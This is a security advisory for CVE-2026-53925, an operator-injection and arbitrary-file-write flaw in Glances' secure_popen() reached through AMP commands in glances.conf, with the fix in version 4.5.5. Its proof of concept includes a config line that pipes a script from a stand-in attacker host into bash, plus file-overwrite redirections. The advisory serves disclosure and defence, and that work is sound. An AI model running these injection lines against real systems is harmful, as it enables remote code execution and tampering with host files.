high · 7.8CVE-2026-53925Jun 26, 2026

CVE-2026-53925: Glances Arbitrary File Write via secure_popen Operator Injection in AMP Configuration

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

Glances lets AMP module commands reach an internal shell-operator parser without any sanitization, so anyone who can write to glances.conf can overwrite arbitrary files or chain commands on the host.

Packageglances
Ecosystempip
Affected>= 4.0.8, < 4.5.5
Fixed in4.5.5
CVE-2026-53925: Glances Arbitrary File Write via secure_popen Operator Injection in AMP Configuration

The problem

The `secure_popen()` function in `glances/secure.py` implements its own mini-shell: it splits a command string on `>`, `|`, and `&&` before calling `subprocess.Popen(shell=False)` on each part. No path validation is applied to the redirection target.

AMP modules load their `command` and `service_cmd` values directly from `glances.conf` and pass them straight to `secure_popen()`. An attacker who can modify that config file can therefore write arbitrary content to any file the Glances process can reach, pipe output to any program, or chain extra commands.

The existing `--disable-config-exec` flag (added for CVE-2026-33641) does not help here. It only blocks backtick execution inside `config.get_value()`. A value like `echo x > /etc/crontab` contains no backticks and flows through unchanged.

Proof of concept

bash
# glances.conf (attacker-controlled)
[amp_poc]
enable=true
regex=.*
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/pwned

# secure_popen() splits on '>' and calls:
#   subprocess.Popen(['echo', 'POC_ARBITRARY_FILE_WRITE'], stdout=open('/tmp/pwned', 'w'))

# Command chaining variant
command=echo x && curl http://attacker.com/shell.sh | bash

# SystemV AMP variant (glances/amps/systemv/__init__.py:60)
[amp_systemv]
service_cmd=id > /tmp/pwned

The root cause (CWE-22) is in `__secure_popen()` at `glances/secure.py` lines 39-45 and 69-72: after splitting on `>`, the path token is used directly in `open(stdout_redirect, 'w')` with no `os.path.realpath` check or allowed-directory guard.

The fix in 4.5.5 removes the operator-parsing logic from `secure_popen()` and replaces the affected call sites with `subprocess.run(shell=False)` and explicit argument lists. This means `>`, `|`, and `&&` in a config value are treated as literal characters, not control operators, so the redirection/chaining path never executes.

The fix

Upgrade to Glances 4.5.5 (released 13 June 2026). The patch replaces `secure_popen()` call sites in `amps/default/__init__.py` and `amps/systemv/__init__.py` with `subprocess.run(shell=False)` using explicit argument arrays, eliminating the operator-parsing logic entirely.

As a defence-in-depth measure, restrict write access to `glances.conf` to the Glances service account only, and run Glances under a dedicated low-privilege user rather than root.

Reported by MichaIng.

References: [1][2][3]